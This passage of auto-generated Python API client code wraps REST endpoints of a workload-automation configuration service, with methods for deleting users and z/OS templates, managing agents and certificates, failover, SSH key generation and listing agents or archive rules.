auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_user(self, user, **kwargs): # noqa: E501
"""Delete user # noqa: E501
Delete user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: The user name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_user_with_http_info(user, **kwargs) # noqa: E501
else:
(data) = self.delete_user_with_http_info(user, **kwargs) # noqa: E501
return data
def delete_user_with_http_info(self, user, **kwargs): # noqa: E501
"""Delete user # noqa: E501
Delete user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_user_with_http_info(user, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: The user name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `delete_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/{user}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_zos_template(self, server, agent, template_name, **kwargs): # noqa: E501
"""Delete z/OS Template # noqa: E501
Delete z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_zos_template(server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.delete_zos_template_with_http_info(server, agent, template_name, **kwargs) # noqa: E501
return data
def delete_zos_template_with_http_info(self, server, agent, template_name, **kwargs): # noqa: E501
"""Delete z/OS Template # noqa: E501
Delete z/OS Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_zos_template_with_http_info(server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The z/OS Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_zos_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `delete_zos_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `delete_zos_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `delete_zos_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def deploy_agent_certificate(self, crt_file, ca_chain_file, server, agent, **kwargs): # noqa: E501
"""Deploy certificate (CRT). # noqa: E501
Deploy certificate (CRT) on SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_agent_certificate(crt_file, ca_chain_file, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str crt_file: (required)
:param str ca_chain_file: (required)
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deploy_agent_certificate_with_http_info(crt_file, ca_chain_file, server, agent, **kwargs) # noqa: E501
else:
(data) = self.deploy_agent_certificate_with_http_info(crt_file, ca_chain_file, server, agent, **kwargs) # noqa: E501
return data
def deploy_agent_certificate_with_http_info(self, crt_file, ca_chain_file, server, agent, **kwargs): # noqa: E501
"""Deploy certificate (CRT). # noqa: E501
Deploy certificate (CRT) on SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deploy_agent_certificate_with_http_info(crt_file, ca_chain_file, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str crt_file: (required)
:param str ca_chain_file: (required)
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['crt_file', 'ca_chain_file', 'server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method deploy_agent_certificate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'crt_file' is set
if ('crt_file' not in params or
params['crt_file'] is None):
raise ValueError("Missing the required parameter `crt_file` when calling `deploy_agent_certificate`") # noqa: E501
# verify the required parameter 'ca_chain_file' is set
if ('ca_chain_file' not in params or
params['ca_chain_file'] is None):
raise ValueError("Missing the required parameter `ca_chain_file` when calling `deploy_agent_certificate`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `deploy_agent_certificate`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `deploy_agent_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'crt_file' in params:
local_var_files['crtFile'] = params['crt_file'] # noqa: E501
if 'ca_chain_file' in params:
local_var_files['caChainFile'] = params['ca_chain_file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/crt', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disable_agent(self, server, agent, **kwargs): # noqa: E501
"""disable agent from the Server # noqa: E501
Disable an Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_agent(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected too. (required)
:param str agent: The Agent to be disabled. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.disable_agent_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def disable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""disable agent from the Server # noqa: E501
Disable an Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.disable_agent_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected too. (required)
:param str agent: The Agent to be disabled. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disable_agent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `disable_agent`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `disable_agent`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/disable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def enable_agent(self, server, agent, **kwargs): # noqa: E501
"""enable agent from the Server # noqa: E501
Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_agent(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected too. (required)
:param str agent: The Agent to be enabled. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.enable_agent_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def enable_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""enable agent from the Server # noqa: E501
Enable an Agent. This command does not install or configure the agent. It only enable existing agent in the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.enable_agent_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected too. (required)
:param str agent: The Agent to be enabled. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method enable_agent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `enable_agent`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `enable_agent`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/enable', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def failover(self, server, **kwargs): # noqa: E501
"""Perform Manual Failover on a specified Server # noqa: E501
Perform Manual Failover on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.failover(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.failover_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.failover_with_http_info(server, **kwargs) # noqa: E501
return data
def failover_with_http_info(self, server, **kwargs): # noqa: E501
"""Perform Manual Failover on a specified Server # noqa: E501
Perform Manual Failover on a specified Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.failover_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method failover" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `failover`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/failover', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def generate_mft_rsa_ssh_key(self, body, server, agent, **kwargs): # noqa: E501
"""Generate RSA SSH Key # noqa: E501
Generate RSA SSH Key pair for SFTP account authentication # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_mft_rsa_ssh_key(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SshKeyProperties body: Ssh Key pair properites (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, **kwargs) # noqa: E501
else:
(data) = self.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, **kwargs) # noqa: E501
return data
def generate_mft_rsa_ssh_key_with_http_info(self, body, server, agent, **kwargs): # noqa: E501
"""Generate RSA SSH Key # noqa: E501
Generate RSA SSH Key pair for SFTP account authentication # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.generate_mft_rsa_ssh_key_with_http_info(body, server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SshKeyProperties body: Ssh Key pair properites (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method generate_mft_rsa_ssh_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `generate_mft_rsa_ssh_key`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/ssh/key', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_agent_certificate_expiration_date(self, server, agent, **kwargs): # noqa: E501
"""Get certificate expiration date. # noqa: E501
Get the certificate expiration date of SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_certificate_expiration_date(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: AgentCertificateExpirationData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agent_certificate_expiration_date_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_agent_certificate_expiration_date_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_agent_certificate_expiration_date_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""Get certificate expiration date. # noqa: E501
Get the certificate expiration date of SSL configured Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_certificate_expiration_date_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:return: AgentCertificateExpirationData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_agent_certificate_expiration_date" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_agent_certificate_expiration_date`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_agent_certificate_expiration_date`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/crt/expiration', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentCertificateExpirationData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_agent_parameters(self, server, agent, **kwargs): # noqa: E501
"""get agent parameters # noqa: E501
Get all the parameters of the specified Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_parameters(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to query. (required)
:param bool extended_data: True to return more agent parameters. HIDDEN
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_agent_parameters_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_agent_parameters_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""get agent parameters # noqa: E501
Get all the parameters of the specified Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agent_parameters_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to query. (required)
:param bool extended_data: True to return more agent parameters. HIDDEN
:return: KeyValueListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'extended_data'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_agent_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_agent_parameters`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_agent_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
if 'extended_data' in params:
query_params.append(('extendedData', params['extended_data'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='KeyValueListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_agents(self, server, **kwargs): # noqa: E501
"""get Server agents # noqa: E501
Get all the agents of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agents(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
:param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
:return: AgentDetailsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_agents_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.get_agents_with_http_info(server, **kwargs) # noqa: E501
return data
def get_agents_with_http_info(self, server, **kwargs): # noqa: E501
"""get Server agents # noqa: E501
Get all the agents of the specified Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_agents_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server to query. Optionally you can filter agent name of host or alias of the Agent (required)
:param str agent: Optionally case insensitive agent name filter of host or alias of the Agent. `ctm server:agents::get Server AgentName` returns all agents which names start with `agentname`
:return: AgentDetailsList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_agents" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_agents`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
if 'agent' in params:
query_params.append(('agent', params['agent'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agents', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentDetailsList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_archive_rules(self, **kwargs): # noqa: E501
"""Get all Workload Archiving rules # noqa: E501
Get all the Archiving rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_archive_rules(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ArchiveRulesList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_archive_rules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_archive_rules_with_http_info(**kwargs) # noqa: E501
return data
def get_all_archive_rules_with_http_info(self, **kwargs): # noqa: E501
"""Get all Workload Archiving rules # noqa: E501
Get all the Archiving rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_archive_rules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: ArchiveRulesList
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_archive_rules" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/rules', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArchiveRulesList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_authorization_roles(self, **kwargs): # noqa: E501
"""Get Authorization Roles # noqa: E501
Get Authorization Roles # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_authorization_roles(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role: The Role name.
:param str description: The Role description.
:return: RoleHeaderList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
